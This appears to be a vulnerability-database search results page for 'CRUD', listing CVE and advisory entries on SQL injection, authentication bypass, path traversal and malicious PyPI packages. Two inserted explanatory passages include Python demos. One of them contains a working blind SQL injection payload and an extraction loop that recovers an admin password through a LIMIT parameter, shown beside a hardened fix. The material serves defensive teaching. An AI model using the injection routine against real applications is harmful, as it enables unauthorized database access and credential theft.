29 matches found
CVE-2025-41029
SQL injection vulnerability in Zeon Academy Pro by Zeon Global Tech. This vulnerability allows an attacker to retrieve, create, update, and delete databases by sending a POST request using the parameter 'phonenumber' in '/private/continue-upload.php'...
EUVD-2025-28905
Malicious code in bioql PyPI...
EUVD-2021-32777
Malicious code in bioql PyPI...
CVE-2022-42744
CandidATS version 3.0.0 allows an external attacker to perform CRUD operations on the application databases. This is possible because the application does not correctly validate the entriesPerPage parameter against SQLi attacks...
Directus allows unauthenticated access to WebSocket events and operations
Summary When setting WEBSOCKETS_GRAPHQL_AUTH or WEBSOCKETS_REST_AUTH to "public", an unauthenticated user is able to perform any of the supported operations (CRUD, subscriptions) with full admin privileges. Details Accountability for unauthenticated WebSocket requests is set to null, which used to be "publi...
CVE-2023-38367
IBM Cloud Pak Foundational Services Identity Provider idP API IBM Cloud Pak for Automation 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1, and 22.0.2 allows CRUD Operations with an invalid token. This could allow an unauthenticated attacker ...
CVE-2023-38367 IBM Cloud Pak for Automation authentication bypass
IBM Cloud Pak Foundational Services Identity Provider idP API IBM Cloud Pak for Automation 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1, and 22.0.2 allows CRUD Operations with an invalid token. This could allow an unauthenticated attacker ...
PT-2024-12715 · Ibm · Ibm Cloud Pak Foundational Services Identity Provider
Name of the Vulnerable Software and Affected Versions: IBM Cloud Pak Foundational Services Identity Provider idP API versions 18.0.0 through 22.0.2 Description: The issue allows an unauthenticated attacker to perform CRUD operations using an invalid token, potentially enabling them to view, updat...
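The Directus WebSocket advisory and the IBM Cloud Pak entries above describe the same bug class: an absent or invalid credential is turned into a "no identity" value (null) and the authorization layer then treats that value as the unrestricted internal caller instead of as an anonymous user. The following is an added illustration, not code from Directus, IBM or the advisories; the HMAC token format, the SECRET key, the PERMISSIONS table and the collection names are constructed assumptions for the example.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Assumed for this example only (not the real Directus/IBM token scheme):
# a token is base64url(JSON claims) + "." + hex(HMAC-SHA256(claims)).
SECRET = b"constructed-example-key"

# Constructed role -> collection -> allowed actions table.
PERMISSIONS = {
    "public": {"articles": {"read"}},
    "editor": {"articles": {"create", "read", "update"}},
}


def issue_token(role: str) -> str:
    """Mint a signed token for the given role."""
    body = base64.urlsafe_b64encode(json.dumps({"role": role}).encode()).decode()
    sig = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{sig}"


def verify_token(token: Optional[str]) -> Optional[dict]:
    """Return the claims, or None if the token is absent, malformed or forged."""
    if not token or "." not in token:
        return None
    body, sig = token.rsplit(".", 1)
    expected = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return None
    try:
        claims = json.loads(base64.urlsafe_b64decode(body.encode()))
    except ValueError:  # binascii.Error and JSONDecodeError are ValueErrors
        return None
    return claims if isinstance(claims, dict) else None


def _allowed(role: str, collection: str, action: str) -> bool:
    return action in PERMISSIONS.get(role, {}).get(collection, set())


def authorize_fail_open(token: Optional[str], collection: str, action: str) -> bool:
    """The vulnerable pattern: None (no/invalid token) bypasses every check."""
    claims = verify_token(token)
    # BUG: "no accountability" is conflated with "internal system caller",
    # so an unauthenticated or forged request gets full privileges.
    if claims is None:
        return True
    return _allowed(claims.get("role", "public"), collection, action)


def authorize_fail_closed(token: Optional[str], collection: str, action: str) -> bool:
    """The hardened pattern: no valid identity means the anonymous role."""
    claims = verify_token(token)
    role = claims["role"] if claims and "role" in claims else "public"
    return _allowed(role, collection, action)


if __name__ == "__main__":
    print("fail-open, no token, delete:", authorize_fail_open(None, "articles", "delete"))
    print("fail-closed, no token, delete:", authorize_fail_closed(None, "articles", "delete"))
    print("fail-closed, editor, update:",
          authorize_fail_closed(issue_token("editor"), "articles", "update"))
```

The point to check in any real code base is the sentinel: whatever value the authenticator produces on failure must map to the least-privileged role (or be rejected outright), never to the "skip permissions" path reserved for trusted internal calls.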
CVE-2024-1704
A vulnerability was found in ZhongBangKeJi CRMEB 5.2.2. It has been declared as critical. This vulnerability affects the function save/delete of the file /adminapi/system/crud. The manipulation leads to path traversal. The exploit has been disclosed to the public and may be used. The identifier o...
CRUD VS REST Explained
In web development, two terms often puzzle newcomers and even seasoned developers: CRUD and REST. These two concepts form the bedrock for understanding how data is manipulated and transferred across the World Wide We...
Design/Logic Flaw
CandidATS version 3.0.0 allows an external attacker to perform CRUD operations on the application databases. This is possible because the application does not correctly validate the entriesPerPage parameter against SQLi attacks...
CVE-2022-42744
CVE-2022-42744 affects CandidATS at version 3.0.0. The root cause is improper validation of the entriesPerPage parameter, enabling an external attacker to perform CRUD operations on the application databases via SQL injection. Impact is high: confidentiality, integrity, and availability are all c...
PT-2022-26534 · Candidats · Candidats
Name of the Vulnerable Software and Affected Versions: CandidATS version 3.0.0 Description: The issue allows an external attacker to perform CRUD operations on the application databases due to incorrect validation of the entriesPerPage parameter against SQL injection attacks. Recommendations: For...
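The CandidATS entries above describe a pagination parameter (entriesPerPage) spliced into SQL without validation. A page-size value typically lands in a LIMIT clause, where UNION tricks do not apply, but SQLite (like other engines) accepts an arbitrary scalar expression there, so an attacker can still exfiltrate data blind by making the row count depend on a subquery. The example below is added here and is not CandidATS code; the schema, the table and column names and the "admin" password are constructed for the demonstration. It shows the vulnerable string-splicing beside a hardened version that validates the parameter as a bounded integer and binds it.

```python
import re
import sqlite3
from typing import Callable, List

# Constructed sample schema (not CandidATS's): a candidate list to paginate
# and a user table holding the secret the attacker wants to read.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE candidate (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO candidate (name) VALUES ('Ada'), ('Bob'), ('Cyd'), ('Dee');
        CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO user (username, password) VALUES ('admin', 's3cret');
    """)
    return con


def list_candidates_vulnerable(con: sqlite3.Connection, entries_per_page: str) -> List[str]:
    # The request parameter is spliced into the SQL text exactly as received.
    sql = f"SELECT name FROM candidate ORDER BY id LIMIT {entries_per_page}"
    return [row[0] for row in con.execute(sql)]


def parse_entries_per_page(raw, default: int = 15, maximum: int = 100) -> int:
    """Accept only a plain decimal integer within [1, maximum]; otherwise default."""
    s = str(raw).strip()
    if not re.fullmatch(r"[0-9]{1,6}", s):
        return default
    n = int(s)
    return n if 1 <= n <= maximum else default


def list_candidates_hardened(con: sqlite3.Connection, entries_per_page: str) -> List[str]:
    n = parse_entries_per_page(entries_per_page)
    # The value is now an int and is bound, never concatenated.
    sql = "SELECT name FROM candidate ORDER BY id LIMIT ?"
    return [row[0] for row in con.execute(sql, (n,))]


def blind_extract_password(con: sqlite3.Connection,
                           list_fn: Callable[[sqlite3.Connection, str], List[str]],
                           max_len: int = 16) -> str:
    """Boolean-based blind extraction through the LIMIT expression.

    The injected subquery evaluates to 1 when the guessed prefix matches the
    stored password and to 0 otherwise, so the number of rows returned leaks
    one character per round. Returns whatever could be recovered.
    """
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    known = ""
    for _ in range(max_len):
        for ch in alphabet:
            guess = known + ch
            payload = ("(SELECT CASE WHEN (SELECT password FROM user WHERE username='admin') "
                       f"LIKE '{guess}%' THEN 1 ELSE 0 END)")
            if len(list_fn(con, payload)) == 1:
                known = guess
                break
        else:
            break  # no character extended the prefix: extraction finished
    return known


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", blind_extract_password(db, list_candidates_vulnerable))
    print("hardened:  ", repr(blind_extract_password(db, list_candidates_hardened)))
```

Against the hardened function every payload fails the integer check, falls back to the default page size and returns the same row count regardless of the guess, so the oracle disappears. Note that validating the type is what closes the hole here; binding alone would also work for LIMIT in SQLite, but an allow-list of bounded integers is the portable fix for engines and ORMs that do not let LIMIT be parameterized.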
ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File Modification
#!/usr/bin/env python3 # -*- coding: utf-8 -*- ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD Vendor: Industrial Control Links, Inc. Product web page: http://www.iclinks.com Product datasheet:...
Exploit for Missing Authorization in Vehicle_Service_Management_System_Project Vehicle_Service_Management_System
CVE-2021-46075 Exploit Title: Vehicle Service Management...
Sourcecodester Vehicle Service Management System Elevation of Privilege Vulnerability
Sourcecodester Vehicle Service Management System is an open source PHP project. A simple Web application for automotive repair/service stores or businesses. Sourcecodester Vehicle Service Management System has an elevation of privilege vulnerability that could be exploited by attackers to access...